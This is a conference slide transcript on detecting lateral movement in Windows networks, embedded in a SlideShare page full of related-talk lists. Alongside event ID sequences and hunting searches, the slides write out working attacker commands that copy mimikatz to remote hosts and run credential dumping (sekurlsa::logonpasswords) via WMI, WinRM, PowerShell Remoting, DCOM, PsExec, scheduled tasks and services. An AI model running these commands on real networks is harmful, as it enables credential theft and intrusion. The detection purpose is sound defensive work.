DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
A complete guide to Node.js
A complete guide to Node.jsA complete guide to Node.js
A complete guide to Node.jsPrabin Silwal
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Nagios
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying AgentsDFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying AgentsChristopher Gerritz
 
Tick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepTick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepGianluca Arbezzano
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick StackGianluca Arbezzano
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
Real World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js ApplicationsReal World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js ApplicationsBen Hall
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Duck Hunter - The return of autorun
Duck Hunter - The return of autorunDuck Hunter - The return of autorun
Duck Hunter - The return of autorunNimrod Levy
 

Similar to Hunting Lateral Movement Windows Infrastructure Techniques Detection (20)

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
A complete guide to Node.js
A complete guide to Node.jsA complete guide to Node.js
A complete guide to Node.js
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying AgentsDFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
 
Tick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepTick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleep
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
Real World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js ApplicationsReal World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js Applications
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Duck Hunter - The return of autorun
Duck Hunter - The return of autorunDuck Hunter - The return of autorun
Duck Hunter - The return of autorun
 

More from Sergey Soldatov

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security OperationsSergey Soldatov
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?Sergey Soldatov
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноSergey Soldatov
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!Sergey Soldatov
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыSergey Soldatov
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationSergey Soldatov
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими рукамиSergey Soldatov
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5Sergey Soldatov
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!Sergey Soldatov
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографииНекриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографииSergey Soldatov
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensourceSergey Soldatov
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDMSergey Soldatov
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovPHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovSergey Soldatov
 
Infosecurity management in the Enterprise
Infosecurity management in the EnterpriseInfosecurity management in the Enterprise
Infosecurity management in the EnterpriseSergey Soldatov
 
Безопасность мобильных устройств
Безопасность мобильных устройствБезопасность мобильных устройств
Безопасность мобильных устройствSergey Soldatov
 
How to catch your “hacker” or makeshift security
How to catch your “hacker” or makeshift securityHow to catch your “hacker” or makeshift security
How to catch your “hacker” or makeshift securitySergey Soldatov
 
Drive by-download attack evolution zero nights v3
Drive by-download attack evolution zero nights v3Drive by-download attack evolution zero nights v3
Drive by-download attack evolution zero nights v3Sergey Soldatov
 

More from Sergey Soldatov (19)

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security Operations
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратно
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструменты
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformation
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими руками
 
Вопросы к DLP
Вопросы к DLPВопросы к DLP
Вопросы к DLP
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографииНекриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей православной криптографии
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensource
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDM
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovPHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
 
Infosecurity management in the Enterprise
Infosecurity management in the EnterpriseInfosecurity management in the Enterprise
Infosecurity management in the Enterprise
 
Безопасность мобильных устройств
Безопасность мобильных устройствБезопасность мобильных устройств
Безопасность мобильных устройств
 
How to catch your “hacker” or makeshift security
How to catch your “hacker” or makeshift securityHow to catch your “hacker” or makeshift security
How to catch your “hacker” or makeshift security
 
Drive by-download attack evolution zero nights v3
Drive by-download attack evolution zero nights v3Drive by-download attack evolution zero nights v3
Drive by-download attack evolution zero nights v3
 

Recently uploaded

Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 

Recently uploaded (20)

Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 

Hunting Lateral Movement Windows Infrastructure Techniques Detection

  • 1. Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
  • 2. Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
  • 3. What we’re going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
  • 4. Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools: • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
  • 5. Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
  • 6. Remote File Copy over SMB – the most interesting events
  • 7. Hunting: search for administrative shares connections
  • 9. Hunting: search for file creation/changes in autostart locations
  • 10. Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 11. Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
  • 12. Remote execution via WMI – the most interesting events
  • 13. Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 14. Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
  • 15. Remote execution via WinRM – the most interesting events
  • 16. Remote execution via Powershell Remoting • Powershell scripts • Powershell Invoke-Command cmdlet: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 17. Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
  • 18. Remote execution via Powershell Remoting – the most interesting events
  • 19. Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
  • 20. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
  • 21. Remote execution via MMC20.Application COM – the most interesting events
  • 22. Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
  • 23. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
  • 24. Remote execution via PsExec (& clones) – the most interesting events
  • 25. Hunting: search for PsExec (& clones) artifacts – services
  • 26. Hunting: search for PsExec (& clones) artifacts – access to pipes
  • 27. Remote execution via PsExec (& clones) – the most interesting events
  • 28. Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
  • 29. Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 30. Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 31. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
  • 32. Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
  • 33. Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
  • 34. Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational event log
  • 35. Remote execution via Scheduled Tasks – the most interesting events
  • 36. Hunting: search for remotely created or updated scheduler tasks
  • 37. Remote execution via Scheduled Tasks – the most interesting events
  • 38. Hunting: search for ATSVC pipe connections
  • 39. Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
